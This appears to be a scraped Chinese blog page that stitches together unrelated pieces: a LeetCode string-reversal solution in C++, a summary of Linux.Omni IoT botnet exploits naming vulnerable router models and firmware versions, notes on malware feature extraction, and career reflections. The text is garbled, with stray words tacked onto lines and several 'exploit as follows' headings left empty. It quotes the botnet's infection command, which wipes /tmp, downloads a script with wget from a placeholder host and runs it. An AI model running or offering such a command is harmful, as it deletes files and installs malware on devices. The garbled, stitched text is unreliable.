https://leetcode.com/problems/reverse-string/html
编写一个以字符串做为输入并逆转字符串的函数。linux
字符串大于0,就从最末尾开始取值。ios
#include "pch.h" #include <stdio.h> #include <string> #include <iostream> #include <algorithm> using std::string; class Solution { public: string reverseString(string s) { string result = ""; for (int i =s.length()-1;i>=0 ; i--) { result += s.at(i); } return result; } }; int main() { // 使用内容 Solution nSolution; nSolution.reverseString("abcdef"); }
Linux下针对IoT威胁的分类和分析。算法
使用什么方式对IOT设备进行攻击。安全
Linux.Omni因其感染库包含了许多漏洞(总共11种)bash
利用的IoT设备漏洞cookie
VACRON网络录像机中"board.cgi"参数存在代码注入的漏洞。网络
经过对路由器“cgi-bin/”目录进行GET请求而进行的远程代码执行攻击。函数
IoTReaper使用的是hedwig.cgi参数cookie溢出的漏洞,Omni使用的则是UPnP端口漏洞。工具
Omni的POST请求以下:
咱们能够找到对应的二进制命令:
存在漏洞的固件版本是:
DIR-300 rev B – 2.14b01,
DIR-600 – 2.16b01,
DIR-645 – 1.04b01,
DIR-845 – 1.01b02,
DIR-865 – 1.05b03。
与“/language/Swedish”资源相关联,容许远程执行代码。
经过CAPTCHA绕过登陆,并容许外部攻击者执行远程代码。
D-Link路由器有此漏洞的版本:
DI-524 C1 3.23,
DIR-628 B2 1.20NA1.22NA,
DIR-655 A1 1.30EA
漏洞利用以下:
二进制中的指令:
在华为HG532路由器中,能够经过修改HTTP请求来利用配置文件验证错误的漏洞。
此漏洞已在分析Okiru/Satori僵尸网络的文章中(Analysis of Linux.Okiru)被检测及分析。
Netgear路由器DGN1000 1.1.00.48固件中存在容许远程执行代码而无需事先验证的漏洞。
使用Realtek SDK和miniigd守护程序的不一样设备都存在经过UPnP SOAP接口的命令注入漏洞。
GPON路由器的最新漏洞
尽管攻击方式多种多样, 在受感染设备上运行的命令是一致的:
cd /tmp;rm -rf *;wget http://%s/{marcaDispositivo};sh /tmp/{marcaDispositivo}
下载的文件是bash脚本,它依据受感染设备的不一样构架来下载样本。
网络安全设备报警,某台机器中毒。
如何快速找到机器里的恶意代码相关进程、文件。
经过搜索国内外恶意代码公开的分析报告,分析样本,提取行为特征。
逆向分析收集到的样本,而后提取规则:
文件规则:文件路径、Yara规则
注册表:注册表路径、子项、类型、值
内存:内存特征码、内存类型、内存保护属性、内存块大小范围
遍历内存代码:
【恶意代码】恶意代码代码特征提取 https://www.cnblogs.com//17bdw/p/10181207.html
只须要搞懂两个知识点:VirtualQueryEx使用、MEMORY_BASIC_INFORMATION 结构体中RegionSize字段的含义。
利用技术变现思路。
在长时间加班状况下,如何保持学习。
以为仍是要从头至尾看完一本书,不容易被分神。
白天工做回家就不想动了。
【技术思路】极客时间-左耳听风-开篇词1
http://www.javashuo.com/article/p-pbmkicar-gp.html
用技术变现:
独立思考 保持学习力、洞察力 寻找合适的环境 具有动手能力。 关注技术付费点 善于提高经验 输出价值观 朋友圈 拥有技术领导力